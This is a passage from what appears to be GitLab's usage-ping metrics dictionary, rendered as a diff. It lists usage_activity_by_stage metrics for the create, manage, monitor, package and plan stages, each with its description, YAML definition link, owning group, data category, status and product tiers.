definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175049_merge_requests_with_optional_codeowners.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.merge_requests_with_overridden_project_rules` + +Number of merge requests that have overridden rules created at the project level. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183339_merge_requests_with_overridden_project_rules.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.merge_requests_with_required_codeowners` + +Count of merge requests with required codeowner approval rules + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175051_merge_requests_with_required_codeowners.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.projects_enforcing_code_owner_approval` + +Count of users creating projects that require approval by code owners for code changes. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182019_projects_enforcing_code_owner_approval.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.projects_imported_from_github` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180630_projects_imported_from_github.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.create.projects_with_disable_overriding_approvers_per_merge_request` + +Total count of projects that do not allow overriding approvers on discrete merge requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182014_projects_with_disable_overriding_approvers_per_merge_request.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.create.projects_with_repositories_enabled` + +Count of projects that have a matching Git repository, result of a Git push action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182023_projects_with_repositories_enabled.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.projects_with_sectional_code_owner_rules` + +Count of projects using code owners with code owners section feature + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182021_projects_with_sectional_code_owner_rules.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.projects_without_disable_overriding_approvers_per_merge_request` + +Count of total projects that do not disable overriding approvers per discrete merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182015_projects_without_disable_overriding_approvers_per_merge_request.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.create.protected_branches` + +Count of users creating projects with repositories making use of at least one protected branch. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182025_protected_branches.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.remote_mirrors` + +Count of users creating projects with remote mirrors. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182017_remote_mirrors.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.create.snippets` + +Count of distinct author_id from snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180316_snippets.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.create.suggestions` + +Count of unique users who create suggestions in merge request comments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175053_suggestions.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.create.total_number_of_locked_files` + +The total number of files which have been locked via the GitLab UI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182028_total_number_of_locked_files.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.total_number_of_path_locks` + +Number of paths/directories manually locked through the UI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182027_total_number_of_path_locks.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.users_using_lfs_locks` + +Number of unique users who have locked files or directories using LFS via the command line + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183346_users_using_lfs_locks.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.users_using_path_locks` + +Number of users who have manually locked paths/directories through the UI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183344_users_using_path_locks.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.enablement.counts.geo_node_usage.git_fetch_event_count_weekly` + +Number of Git fetch events from Prometheus on the Geo secondary + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210309194425_git_fetch_event_count_weekly.yml) + +Group: `group::geo` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.enablement.counts.geo_node_usage.git_push_event_count_weekly` + +Number of Git push events from Prometheus on the Geo secondary + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210604110603_git_push_event_count_weekly.yml) + +Group: `group::geo` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.enablement.geo_secondary_web_oauth_users` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210427212450_geo_secondary_web_oauth_users.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.bulk_imports.gitlab` + +Distinct count of users that triggered an import using the Group Migration tool + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180634_gitlab.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.bulk_imports.gitlab_v1` + +Count of imports using GitLab Migration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180636_gitlab_v1.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.manage.compliance_frameworks_with_pipeline` + +Count of compliance frameworks that have a pipeline configuration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210622123800_compliance_frameworks_with_pipeline.yml) + +Group: `compliance` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + +### `usage_activity_by_stage.manage.custom_compliance_frameworks` + +Total count of all custom compliance framework labels + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210430081610_custom_compliance_frameworks.yml) + +Group: `compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.manage.events` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180754_events.yml) + +Group: `group::manage` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.manage.group_imports.gitlab_migration` + +Count of groups imported using GitLab Migration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180703_gitlab_migration.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.manage.group_imports.group_import` + +Count of group imports using Group Import/Export + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180702_group_import.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.manage.group_saml_enabled` + +Has the instance enabled Group SAML SSO `https://docs.gitlab.com/ee/user/group/saml_sso/` on at least 1 group? + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/settings/20210216180813_group_saml_enabled.yml) + +Group: `group::manage` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium` + +### `usage_activity_by_stage.manage.groups` + +Number of users who are group members. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180756_groups.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.groups_imported` + +Distinct count of users that imported groups using Group Import + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180729_groups_imported.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.issue_imports.csv` + +Count of (attempted) imports from csv files + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180700_csv.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.manage.issue_imports.fogbugz` + +Count of projects imported from fogbugz + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180656_fogbugz.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.manage.issue_imports.jira` + +Count of projects imported from Jira + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180654_jira.yml) + +Group: `group::import` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.manage.issue_imports.phabricator` + +Count of projects imported from phabricator + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180658_phabricator.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.manage.issues_imported.csv` + +Distinct count of users that imported issues into projects using CSV upload + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180727_csv.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.issues_imported.fogbugz` + +Distinct count of users that imported issues into projects using FogBugz + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180724_fogbugz.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.issues_imported.jira` + +Distinct count of users that imported issues into projects using Jira + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180722_jira.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.issues_imported.phabricator` + +Distinct count of users that imported issues into projects using Phabricator + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180726_phabricator.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.ldap_admin_sync_enabled` + +Has the instance configured [LDAP Admin Sync](https://docs.gitlab.com/ee/administration/auth/ldap/#administrator-sync) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/settings/20210216180811_ldap_admin_sync_enabled.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.manage.ldap_group_sync_enabled` + +Has the instance configured [LDAP Group Sync](https://docs.gitlab.com/ee/administration/auth/ldap/#group-sync) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/settings/20210216180809_ldap_group_sync_enabled.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.manage.ldap_keys` + +Number of users creating keys synced as part of LDAP + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180800_ldap_keys.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.manage.ldap_servers` + +Number of [LDAP servers configured for the instance](https://docs.gitlab.com/ee/administration/auth/ldap/#multiple-ldap-servers) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180807_ldap_servers.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.manage.ldap_users` + +Number of users that are linked to LDAP + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180801_ldap_users.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.manage.omniauth_providers` + +Number of unique user logins using an OmniAuth provider + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183400_omniauth_providers.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.bitbucket` + +Count of projects imported from Bitbucket + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180643_bitbucket.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.bitbucket_server` + +Count of projects imported from Bitbucket Server + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180645_bitbucket_server.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.git` + +Count of projects imported by URL + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180649_git.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.gitea` + +Count of projects imported from Gitea + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180647_gitea.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.github` + +Count of projects imported from GitHub + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180641_github.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.gitlab` + +Count of projects imported from GitLab.com + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180639_gitlab.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.gitlab_migration` + +Count of projects imported using GitLab Migration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180652_gitlab_migration.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.gitlab_project` + +Count of projects imported using Project Import/Export + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180638_gitlab_project.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.manifest` + +Count of projects imported using manifst file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180650_manifest.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.project_imports.total` + +Count number of projects imported monthly + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210514141520_project_imports_total.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.projects_imported.bitbucket` + +Distinct count of users that imported projects from Bitbucket Cloud + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180713_bitbucket.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.projects_imported.bitbucket_server` + +Distinct count of users that imported projects from Bitbucket Server + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180715_bitbucket_server.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.projects_imported.git` + +Distinct count of users that imported projects using Import by URL + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180718_git.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.projects_imported.gitea` + +Distinct count of users that imported projects from Gitea + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180716_gitea.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.projects_imported.github` + +Distinct count of users that imported projects from GitHub + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180711_github.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.projects_imported.gitlab` + +Distinct count of users that imported projects from GitLab.com + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180709_gitlab.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.projects_imported.gitlab_project` + +Distinct count of users that imported projects using Project Import/Export + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180707_gitlab_project.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.projects_imported.manifest` + +Distinct count of users that imported projects using Manifest file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180720_manifest.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.projects_imported.total` + +Total count of all projects imported with import_source NOT NULL + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180705_total.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free` + +### `usage_activity_by_stage.manage.projects_with_compliance_framework` + +Number of projects labeled with a compliance framework label [see](https://gitlab.com/gitlab-org/gitlab/-/issues/118671) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180805_projects_with_compliance_framework.yml) + +Group: `group::manage` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `usage_activity_by_stage.manage.unique_users_all_imports` + +Distinct count of users that triggered any kind of import + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180632_unique_users_all_imports.yml) + +Group: `group::import` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.manage.user_auth_by_provider.google_oauth2` + +Number of unique user logins using Google OAuth authentication + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183410_google_oauth2.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.user_auth_by_provider.standard` + +Number of unique user logins using password authentication + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183408_standard.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.user_auth_by_provider.two-factor` + +Number of unique user logins using two factor authentication + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183402_two-factor.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.user_auth_by_provider.two-factor-via-u2f-device` + +Number of unique user logins using two factor via a U2F device + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183404_two-factor-via-u2f-device.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.user_auth_by_provider.two-factor-via-webauthn-device` + +Number of unique user logins using two factor via a WebAuthn device + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183406_two-factor-via-webauthn-device.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.users_created` + +Number of users + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180758_users_created.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.manage.value_stream_management_customized_group_stages` + +Number of custom value stream analytics stages. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180803_value_stream_management_customized_group_stages.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.monitor.clusters` + +Users creating clusters. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180945_clusters.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.monitor.clusters_applications_prometheus` + +Users creating clusters with Prometheus enabled. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180947_clusters_applications_prometheus.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.monitor.operations_dashboard_default_dashboard` + +Active users with enabled operations dashboard + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180949_operations_dashboard_default_dashboard.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium` + +### `usage_activity_by_stage.monitor.operations_dashboard_users_with_projects_added` + +Active users with projects on operations dashboard + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180953_operations_dashboard_users_with_projects_added.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.monitor.projects_incident_sla_enabled` + +Projects where Incident SLA is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180522_projects_incident_sla_enabled.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.monitor.projects_with_alert_incidents` + +Count of unique projects with an incident from an alert + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180520_projects_with_alert_incidents.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.monitor.projects_with_enabled_alert_integrations_histogram` + +Histogram (buckets 1 to 100) of projects with at least 1 enabled integration. + +[Object JSON schema](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/objects_schemas/projects_with_enabled_alert_integrations_histogram.json) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210309165717_projects_with_enabled_alert_integrations_histogram.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.monitor.projects_with_error_tracking_enabled` + +Projects where error tracking is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180517_projects_with_error_tracking_enabled.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.monitor.projects_with_incidents` + +Count of unique projects with an incident + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180518_projects_with_incidents.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.monitor.projects_with_tracing_enabled` + +Projects with tracing enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180951_projects_with_tracing_enabled.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.package.projects_with_packages` + +Projects with package registry enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181055_projects_with_packages.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.plan.assignee_lists` + +Count of users creating assignee lists on Boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181132_assignee_lists.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.plan.epics` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181134_epics.yml) + +Group: `group::plan` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.plan.issues` + +Count of users creating Issues + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181115_issues.yml) + +Group: `group::project management` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.plan.label_lists` + +Count of users creating label lists on Boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181135_label_lists.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.plan.milestone_lists` + +Count of users creating milestone lists on Boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181137_milestone_lists.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.plan.notes` + +Count of users creating Notes on Issues + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181117_notes.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.plan.projects` + +Count of users creating projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181119_projects.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.plan.projects_jira_active` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181126_projects_jira_active.yml) + +Group: `group::plan` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### 